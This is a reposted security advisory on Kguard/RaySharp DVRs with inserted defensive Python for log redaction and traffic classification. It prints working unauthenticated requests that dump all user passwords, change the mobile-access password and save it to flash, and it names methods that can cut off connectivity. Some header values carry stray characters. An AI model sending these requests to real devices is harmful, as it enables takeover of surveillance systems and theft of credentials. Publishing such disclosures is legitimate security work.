Aerosol Posted March 10, 2015

MULTIPLE VULNERABILITIES WITH KGUARD DIGITAL VIDEO RECORDERS, February 10, 2015

PRODUCT DESCRIPTION

The Kguard SHA104 & SHA108 are 4ch/8ch H.264 DVRs designed for economical application. Their stylish, streamlined hardware design and excellent performance make them a fast-moving, competitive and ideal solution for entry-level & distribution channels.

VENDOR REFERENCE: http://us.kworld-global.com/main/prod_in.aspx?mnuid=1306&modid=10&prodid=527

VULNERABILITY DESCRIPTION

1. Insufficient authentication and authorization

A deficiency in handling authentication and authorization has been found in the Kguard 104/108 models. While password-based authentication is used by the ActiveX component to protect the login page, all communication with the application server on port 9000 is accepted directly, with insufficient or improper authorization. The request HI_SRDK_SYS_USERMNG_GetUserList, for example, returns all the usernames in the system together with their passwords. The example below is an actual, unmodified request and the server's response.

REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0
CSeq:6
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:51 3
Segment-Num:1
Segment-Seq:1
Data-Length:4V

MCTP/1.0 200 OK
Content-Type:text/HDP
CSeq:6
Return-Code:0
Content-Length:2326
Segment-Num:2
Segment-Seq:1
Data-Length:2240
eric 111222 111222 admin 111222 111222 333444 333444 555666 555666 user4 user5 user6
Segment-Seq:2
Data-Length:4

An interesting request is HI_SRDK_NET_MOBILE_GetOwspAttr. If configured, this allows mobile devices to access and monitor the cameras on port 18004.
An actual, unmodified request and response is shown below.

REMOTE HI_SRDK_NET_MOBILE_GetOwspAttr MCTP/1.0
CSeq:15
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:15
Segment-Num:0V

MCTP/1.0 200 OK
Content-Type:text/HDP
CSeq:15
Return-Code:0
Content-Length:161
Segment-Num:1
Segment-Seq:1
Data-Length:112
admin 111222

The password for this user can be changed easily by executing the HI_SRDK_NET_MOBILE_SetOwspAttr request as shown below, and the change can be written to persistent storage by executing HI_SRDK_DEV_SaveFlash:

REMOTE HI_SRDK_NET_MOBILE_SetOwspAttr MCTP/1.0
CSeq:1
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:161
Segment-Num:1
Segment-Seq:1
Data-Length:112
admin.t..|A<.......n(...........111222444.eted!.p.c<.... ... ...TF..............................................

The logs from the application server confirm that the execution was successful:

[MCTP] [HI_MCTP_MethodProc_Remote] SUCCESS!!!!! /home/yala/svn/D9108_MLANG_QSEE/dvr/modules/vscp/mctp/server/hi_vscp_mctp_mthdproc.c 606
========================
GetNetworkState:192.168.254.200

Logs from the DVR also show that an existing mobile device that tries to connect on port 18004 with the previously stored credentials will fail:

< StreamingServer> [ run] A client(116) connected[2010-09-11 12:30].
< LangtaoCommProto> [ handlePacketBody] Input buffer total length: 60
< LangtaoCommProto> [ handlePacketBody] tlv type: 41
< LangtaoCommProto> [ handlePacketBody] tlv length: 56
< LangtaoCommProto> [ handlePacketBody] Login request received.
< LangtaoCommProto> [ handleLoginReq] User Name: admin Passwrod: 111222
< LangtaoCommProto> [ handleLoginReq] User name and/or password validate fail.
< StreamingServer> [ handleRequest2] Send response to client.
< StreamingServer> [ handleRequest2] Session closed actively.
< StreamingServer> [ run] Handle request fail.
----------------------- SESSION(116) END -----------------------
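Note that the streaming-server log quoted above writes the submitted password in clear text, so anyone collecting these logs for monitoring also collects credentials. The following is an added example, not code from the advisory or from the DVR vendor: it parses the port-18004 session log into structured login events (session id, user, outcome) and redacts the password field before the lines are forwarded. The line format is inferred from the quoted log only; the device's wording for a successful login is not shown in the advisory, so the parser only records failures explicitly and leaves the outcome unknown otherwise.

```python
import re
from typing import Dict, List, Optional

# Session log lines as printed by the DVR's streaming server on port 18004,
# copied from the advisory above (the "Passwrod" spelling is the device's own).
SAMPLE_LOG = """\
< StreamingServer> [ run] A client(116) connected[2010-09-11 12:30].
< LangtaoCommProto> [ handlePacketBody] Input buffer total length: 60
< LangtaoCommProto> [ handlePacketBody] tlv type: 41
< LangtaoCommProto> [ handlePacketBody] tlv length: 56
< LangtaoCommProto> [ handlePacketBody] Login request received.
< LangtaoCommProto> [ handleLoginReq] User Name: admin Passwrod: 111222
< LangtaoCommProto> [ handleLoginReq] User name and/or password validate fail.
< StreamingServer> [ handleRequest2] Send response to client.
< StreamingServer> [ handleRequest2] Session closed actively.
< StreamingServer> [ run] Handle request fail.
----------------------- SESSION(116) END -----------------------
"""

# "< Component> [ function] message" -- format inferred from the quoted log.
LINE_RE = re.compile(r"^<\s*(?P<component>\w+)>\s*\[\s*(?P<func>\w+)\]\s*(?P<msg>.*)$")
CONNECT_RE = re.compile(r"A client\((?P<sid>\d+)\) connected\[(?P<ts>[^\]]+)\]")
# Accept both the device's "Passwrod" and a corrected "Password" spelling.
LOGIN_RE = re.compile(r"User Name:\s*(?P<user>\S+)\s+Passw(?:or|ro)d:\s*(?P<pw>\S*)")
END_RE = re.compile(r"SESSION\((?P<sid>\d+)\) END")


def redact(text: str) -> str:
    """Mask the plaintext password the device writes into its own log."""
    return LOGIN_RE.sub(
        lambda m: f"User Name: {m.group('user')} Password: [REDACTED]", text
    )


def parse_sessions(text: str) -> List[Dict[str, Optional[object]]]:
    """Turn the session log into one record per SESSION(...) block."""
    sessions: List[Dict[str, Optional[object]]] = []
    current: Optional[Dict[str, Optional[object]]] = None
    for raw in text.splitlines():
        end = END_RE.search(raw)
        if end:
            if current is not None and current["session"] == int(end.group("sid")):
                sessions.append(current)
                current = None
            continue
        m = LINE_RE.match(raw)
        if not m:
            continue
        msg = m.group("msg")
        connect = CONNECT_RE.search(msg)
        if connect:
            current = {
                "session": int(connect.group("sid")),
                "connected_at": connect.group("ts"),
                "user": None,
                "login_ok": None,          # stays None unless a failure is logged
                "password_logged": False,  # True when the log leaked a password
            }
            continue
        if current is None:
            continue
        login = LOGIN_RE.search(msg)
        if login:
            current["user"] = login.group("user")
            current["password_logged"] = bool(login.group("pw"))
        elif "validate fail" in msg:
            current["login_ok"] = False
    return sessions


def failed_logins(text: str) -> List[Dict[str, Optional[object]]]:
    """Sessions whose login the device rejected, e.g. a mobile client whose
    stored credentials no longer match after an unauthorised SetOwspAttr."""
    return [s for s in parse_sessions(text) if s["login_ok"] is False]


if __name__ == "__main__":
    for s in failed_logins(SAMPLE_LOG):
        print(s)
    print(redact(SAMPLE_LOG))
```

A burst of `login_ok == False` sessions for a user that previously connected cleanly is the signal to look for, since a change to the mobile-access password through the unauthenticated port-9000 interface shows up first as legitimate clients being turned away on port 18004.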
2. Lack of transport security

The communication with the application server is done by an unprotected ActiveX component that is presented to the browser in the initial session. The lack of transport encryption may allow the requests this component sends to the application server to be exploited. The file is named HiDvrOcx.cab. Unpacking the file shows the libraries being used:

-rw-rw-r--. 1 fjpfajardo fjpfajardo 1443576 Mar 11 2011 HiDvrOcx.ocx
-rw-rw-r--. 1 fjpfajardo fjpfajardo 1443 Mar 11 2011 HiDvrOcx.inf
-rw-rw-r--. 1 fjpfajardo fjpfajardo 27136 Mar 11 2011 HiDvrOcxESN.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxITA.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxBRG.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 20992 Mar 11 2011 HiDvrOcxJPN.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 155648 Mar 11 2011 HiDvrNet.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 487525 Mar 11 2011 HiDvrMedia.dll

Interestingly, checking the DLL named HiDvrNet.dll reveals other control methods that can be presented to the application server as well:

HI_SRDK_NET_MOBILE_GetOwspAttr
HI_SRDK_NET_MOBILE_SetAttr
HI_SRDK_NET_MOBILE_SetOwspAttr
HI_SRDK_NET_Network_DHCP_Client_GetAttr
HI_SRDK_NET_Network_DHCP_Client_SetAttr
HI_SRDK_NET_Network_GetDNSList
HI_SRDK_NET_Network_GetDefaultGateway
HI_SRDK_NET_Network_GetNetdevAttr
HI_SRDK_NET_Network_GetNetdevName
HI_SRDK_NET_Network_SetDNSList
HI_SRDK_NET_Network_SetDefaultGateway
HI_SRDK_NET_Network_SetNetdevAttr
HI_SRDK_NET_SetDdnsAttr
HI_SRDK_NET_SetEmailAttr
HI_SRDK_NET_SetIppreviewVodAttr
HI_SRDK_NET_SetMctpServerPort
HI_SRDK_NET_SetPppoeAttr
HI_SRDK_NET_SetWebServerPort
HI_SRDK_Open_Device
HI_SRDK_RECORDER_GetPlaybackAttr
HI_SRDK_RECORDER_GetRecordAttr
HI_SRDK_RECORDER_GetRecordSchedule
HI_SRDK_RECORDER_SetPlaybackAttr
HI_SRDK_RECORDER_SetRecordAttr
HI_SRDK_RECORDER_SetRecordSchedule
HI_SRDK_SYS_GetDaylightAttr
HI_SRDK_SYS_GetSysMaintainAttr
HI_SRDK_SYS_GetSystemAttr
HI_SRDK_SYS_SetDaylightAttr
HI_SRDK_SYS_SetSysMaintainAttr
HI_SRDK_SYS_SetSystemAttr
HI_SRDK_SYS_USERMNG_AddGroup
HI_SRDK_SYS_USERMNG_AddUser
HI_SRDK_SYS_USERMNG_DelGroup
HI_SRDK_SYS_USERMNG_DelUser
HI_SRDK_SYS_USERMNG_Disable
HI_SRDK_SYS_USERMNG_Enable
HI_SRDK_SYS_USERMNG_GetAuthorityList
HI_SRDK_SYS_USERMNG_GetGroupList
HI_SRDK_SYS_USERMNG_GetUserList
HI_SRDK_SYS_USERMNG_ModifyGroupInfo
HI_SRDK_SYS_USERMNG_ModifyUserInfo

3. Denial of Service and Command Injection

Input is not sanitized or filtered in some of the fields, which may lead to a potential passive denial of service and/or command injection.
By altering some requests, such as HI_SRDK_NET_SetPppoeAttr, HI_SRDK_NET_Network_DHCP_Client_SetAttr, HI_SRDK_NET_SetWebServerPort or HI_SRDK_NET_Network_SetDefaultGateway, a malicious user may be able to disrupt connectivity to the DVR.

REMOTE HI_SRDK_NET_SetMctpServerPort MCTP/1.0
CSeq:58
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:491
Segment-Num:1
Segment-Seq:1
Data-Length:2

REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0
CSeq:61
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:15
Segment-Num:0

The application server that listens for incoming requests on port 9000 is run by a binary called raysharp_dvr, which suggests that the hardware manufacturer is Zhuhai RaySharp Technology Co. While the purpose of this vulnerability analysis is mainly Kguard-related DVRs, I believe that other devices that use the same firmware by the manufacturer and are rebranded in the market are also vulnerable.

576 root 20696 S ./raysharp_dvr
577 root 20696 S ./raysharp_dvr
578 root 20696 S ./raysharp_dvr
579 root 20696 S ./raysharp_dvr
580 root 20696 S ./raysharp_dvr
581 root 20696 S ./raysharp_dvr
582 root 20696 S ./raysharp_dvr

Timeline:
02/07/2015 - Discovery / PoC
02/09/2015 - Reported to vendor (NR)
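Because the port-9000 server accepts any method without per-request authorization, the practical defence while no firmware fix exists is to keep the port off untrusted networks and to watch the traffic that does reach it. The following is an added example, not code from the advisory or from the vendor: a passive parser for the MCTP/1.0 messages quoted in sections 1 and 3, with the method names from the HiDvrNet.dll list in section 2 grouped by what a request can expose (credentials), change (configuration), break (connectivity) or make permanent (flash). The CRLF header framing with a blank line before the body is this example's assumption, taken from the RTSP-like layout of the captures; the risk grouping is the example's own; and the sample capture is constructed from the requests shown above, not a real packet dump.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Method names come from the advisory's HiDvrNet.dll export list and captures;
# which class each one falls into is this example's own assessment.
CREDENTIAL_DISCLOSURE = {
    "HI_SRDK_SYS_USERMNG_GetUserList",  # returns every username with its password
    "HI_SRDK_NET_MOBILE_GetOwspAttr",   # returns the mobile-access credentials
}
CONNECTIVITY_WRITES = {                 # section 3: requests that can cut the DVR off
    "HI_SRDK_NET_SetPppoeAttr",
    "HI_SRDK_NET_Network_DHCP_Client_SetAttr",
    "HI_SRDK_NET_SetWebServerPort",
    "HI_SRDK_NET_Network_SetDefaultGateway",
    "HI_SRDK_NET_SetMctpServerPort",
}
PERSIST = {"HI_SRDK_DEV_SaveFlash"}     # commits prior writes to flash
WRITE_VERBS = ("_Set", "_Add", "_Del", "_Modify", "_Enable", "_Disable")

REQUEST_RE = re.compile(r"^(?P<verb>[A-Z]+) (?P<method>HI_SRDK_\w+) MCTP/1\.0$")
STATUS_RE = re.compile(r"^MCTP/1\.0 (?P<code>\d{3})")


@dataclass
class MctpMessage:
    kind: str                         # "request" or "response"
    method: Optional[str] = None      # requests only
    status: Optional[int] = None      # responses only
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""


def parse_mctp(raw: bytes) -> MctpMessage:
    """Parse one MCTP/1.0 message.  Assumes CRLF-terminated header lines and a
    blank line before the body (inferred from the captures, not documented)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    first, header_lines = lines[0], lines[1:]
    m = REQUEST_RE.match(first)
    if m:
        msg = MctpMessage(kind="request", method=m.group("method"))
    else:
        m = STATUS_RE.match(first)
        if not m:
            raise ValueError(f"not an MCTP/1.0 start line: {first!r}")
        msg = MctpMessage(kind="response", status=int(m.group("code")))
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            msg.headers[name.strip()] = value.strip()
    msg.body = body
    return msg


def risk_of(method: str) -> str:
    """Classify a method by the worst thing an unauthenticated call can do."""
    if method in CREDENTIAL_DISCLOSURE:
        return "credential-disclosure"
    if method in CONNECTIVITY_WRITES:
        return "connectivity-write"
    if method in PERSIST:
        return "persist-to-flash"
    if any(verb in method for verb in WRITE_VERBS):
        return "config-write"
    return "read"


def scan_requests(messages: List[bytes]) -> List[dict]:
    """Flag every request in a capture whose method is more than a plain read."""
    alerts = []
    for raw in messages:
        msg = parse_mctp(raw)
        if msg.kind != "request":
            continue
        risk = risk_of(msg.method or "")
        if risk != "read":
            alerts.append({"cseq": msg.headers.get("CSeq"), "method": msg.method, "risk": risk})
    return alerts


# Constructed sample capture, built from the requests quoted in the advisory.
SAMPLE_CAPTURE = [
    b"REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0\r\nCSeq:6\r\nAccept:text/HDP\r\n"
    b"Content-Type:text/HDP\r\nFunc-Version:0x10\r\nContent-Length:51\r\nSegment-Num:1\r\n"
    b"Segment-Seq:1\r\nData-Length:4\r\n\r\n",
    b"MCTP/1.0 200 OK\r\nContent-Type:text/HDP\r\nCSeq:6\r\nReturn-Code:0\r\n"
    b"Content-Length:2326\r\nSegment-Num:2\r\nSegment-Seq:1\r\nData-Length:2240\r\n\r\n"
    b"eric 111222 111222 admin 111222 111222",
    b"REMOTE HI_SRDK_NET_SetMctpServerPort MCTP/1.0\r\nCSeq:58\r\nAccept:text/HDP\r\n"
    b"Content-Type:text/HDP\r\nFunc-Version:0x10\r\nContent-Length:491\r\nSegment-Num:1\r\n"
    b"Segment-Seq:1\r\nData-Length:2\r\n\r\n",
    b"REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0\r\nCSeq:61\r\nAccept:text/HDP\r\n"
    b"Content-Type:text/HDP\r\nFunc-Version:0x10\r\nContent-Length:15\r\nSegment-Num:0\r\n\r\n",
]

if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_CAPTURE):
        print(alert)
```

The grouping is what turns a list of method names into something a network sensor can act on: a `credential-disclosure` or `connectivity-write` request from any host that is not the known management workstation is worth an alert on its own, and a `config-write` immediately followed by `persist-to-flash` is the exact sequence the advisory shows for changing the mobile-access password.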